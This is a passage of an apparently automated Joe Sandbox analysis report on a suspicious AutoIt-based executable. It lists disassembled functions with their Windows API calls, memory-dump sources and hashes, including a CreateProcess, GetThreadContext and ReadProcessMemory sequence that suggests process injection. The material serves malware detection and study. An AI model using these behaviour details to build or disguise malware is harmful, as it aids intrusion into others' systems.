                                                                              • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                                                                              APIs
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02F15D6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: 679fc0b7d9a55355b7f5a4633f80b32c63c251404629007b41ffb3417eef5966
                                                                              • Instruction ID: 0d76d990074da8bf386d19fc21c93880c063a494d87ecfea6b5f8b3215330526
                                                                              • Opcode Fuzzy Hash: 679fc0b7d9a55355b7f5a4633f80b32c63c251404629007b41ffb3417eef5966
                                                                              • Instruction Fuzzy Hash: 47F0E990E4C310EADD7E0364F94DB71BA2067C16ECFCC4549EB43590B3CB512816CB01
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(?,00000000), ref: 00A89DA3
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A89E39
                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00A89E5B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A88000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a88000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                              • Instruction ID: 0335be98ff5b1c48bfa3eefbd4eea056476ee3eab34db08d2b7e1df31733fb94
                                                                              • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                              • Instruction Fuzzy Hash: 6A12CD24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 55bb2e36a34a5ba19c7e266167272042c4028654939e2a51fb10b59079fe60c9
                                                                              • Instruction ID: 9fd9d2f24ed11de56bc8330837a623f0262b83586172de1d759c042bc2b07aaf
                                                                              • Opcode Fuzzy Hash: 55bb2e36a34a5ba19c7e266167272042c4028654939e2a51fb10b59079fe60c9
                                                                              • Instruction Fuzzy Hash: 04710932D0D3808FDB3687288454775BB69ABD2AE8FCD869AD795CB1E3D3718448C352
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b91dafc315f72cd247953dc075192c650664a9120a2413a466882fe386833eff
                                                                              • Instruction ID: 0a4fef46ed1f4f6af9b01cb9e5d258264f433814ec28732567319422848296d7
                                                                              • Opcode Fuzzy Hash: b91dafc315f72cd247953dc075192c650664a9120a2413a466882fe386833eff
                                                                              • Instruction Fuzzy Hash: 5731F971E0C3808EDB358B28C545335BBACAB91AD8FCD869EE395DA2A6D7758004C752
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                              • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                                                              • Opcode Fuzzy Hash: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                              • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              • Opcode ID: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
                                                                              • Instruction ID: e277250e627d10e0330490a348a3b32a96e3d7cb5ffc8e96ca57e5c84c001af0
                                                                              • Opcode Fuzzy Hash: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
                                                                              • Instruction Fuzzy Hash: 86210072A14A19EBDB108F26E84176E7BB4FB18354F21853FE886C51D0EB38E490D74E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              • Opcode ID: 57bd9c283acc5bcb2b2b360e3dd3e2e9694fe6d0d7b28f1284b8e0398af56708
                                                                              • Instruction ID: 03ec0e1ddcc1c42b0f32453fdad85b9eaadac3e2e088d633c8de65ee5d072679
                                                                              • Opcode Fuzzy Hash: 57bd9c283acc5bcb2b2b360e3dd3e2e9694fe6d0d7b28f1284b8e0398af56708
                                                                              • Instruction Fuzzy Hash: 4111D532A04215ABD714EF28D485C6AB7A9EF85324724812FE905DB3D1DB35FC01C799
                                                                              APIs
                                                                                • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                                                                • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                                                                • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                                              • String ID:
                                                                              • API String ID: 1396898556-0
                                                                              • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                              • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                                                              • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                              • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                              • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                                                              • Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                              • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: 1ac903cd863a45bfed65240f0d7a2170f2ea0836ae70640391046610bd2a2c0b
                                                                              • Instruction ID: 598b094a7a164d1fd3692138aa5b1c16898ad3a4b3ddb678967f9c0a45bf638a
                                                                              • Opcode Fuzzy Hash: 1ac903cd863a45bfed65240f0d7a2170f2ea0836ae70640391046610bd2a2c0b
                                                                              • Instruction Fuzzy Hash: 73017571D0D3409EDB258F2484143767BBCAF86AD4FC98A9AE785EB1A3D7708508CB52
                                                                              APIs
                                                                              • __lock_file.LIBCMT ref: 004248A6
                                                                                • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd_noexit__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2597487223-0
                                                                              • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                              • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                                                                              • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                              • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                              • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                                                                              • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                              • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                                                                              APIs
                                                                              • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: LongNamePath_memmove
                                                                              • String ID:
                                                                              • API String ID: 2514874351-0
                                                                              • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                              • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                                                                              • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                              • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __wfsopen
                                                                              • String ID:
                                                                              • API String ID: 197181222-0
                                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                              • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                              • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A88000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a88000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction ID: d94ed726ba65e282908b1c447908cb50b6f29499798224db0e6c95149f9d7071
                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction Fuzzy Hash: AFE0E67494010DDFDB00EFB4D54D69D7FB4EF14301F100161FD01D2280D6309D508A72
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                                                              • SendMessageW.USER32 ref: 0048CC29
                                                                              • _wcsncpy.LIBCMT ref: 0048CC95
                                                                              • GetKeyState.USER32(00000011), ref: 0048CCB6
                                                                              • GetKeyState.USER32(00000009), ref: 0048CCC3
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                                                              • GetKeyState.USER32(00000010), ref: 0048CCE3
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                                                              • SendMessageW.USER32 ref: 0048CD33
                                                                              • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                                                              • SetCapture.USER32(?), ref: 0048CE69
                                                                              • ClientToScreen.USER32(?,?), ref: 0048CECE
                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                                                              • ReleaseCapture.USER32 ref: 0048CF00
                                                                              • GetCursorPos.USER32(?), ref: 0048CF3A
                                                                              • ScreenToClient.USER32(?,?), ref: 0048CF47
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                                                              • SendMessageW.USER32 ref: 0048CFD1
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                                                              • SendMessageW.USER32 ref: 0048D03D
                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                                                              • GetCursorPos.USER32(?), ref: 0048D08D
                                                                              • ScreenToClient.USER32(?,?), ref: 0048D09A
                                                                              • GetParent.USER32(?), ref: 0048D0BA
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                                                              • SendMessageW.USER32 ref: 0048D154
                                                                              • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                                                              • SendMessageW.USER32 ref: 0048D22F
                                                                              • ClientToScreen.USER32(?,?), ref: 0048D281
                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                              • String ID: @GUI_DRAGID$F$pbL
                                                                              • API String ID: 3977979337-2097280626
                                                                              • Opcode ID: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
                                                                              • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                                                                              • Opcode Fuzzy Hash: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
                                                                              • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$_memset
                                                                              • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                                                              • API String ID: 1357608183-1426331590
                                                                              • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                              • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                                                                              • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                              • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
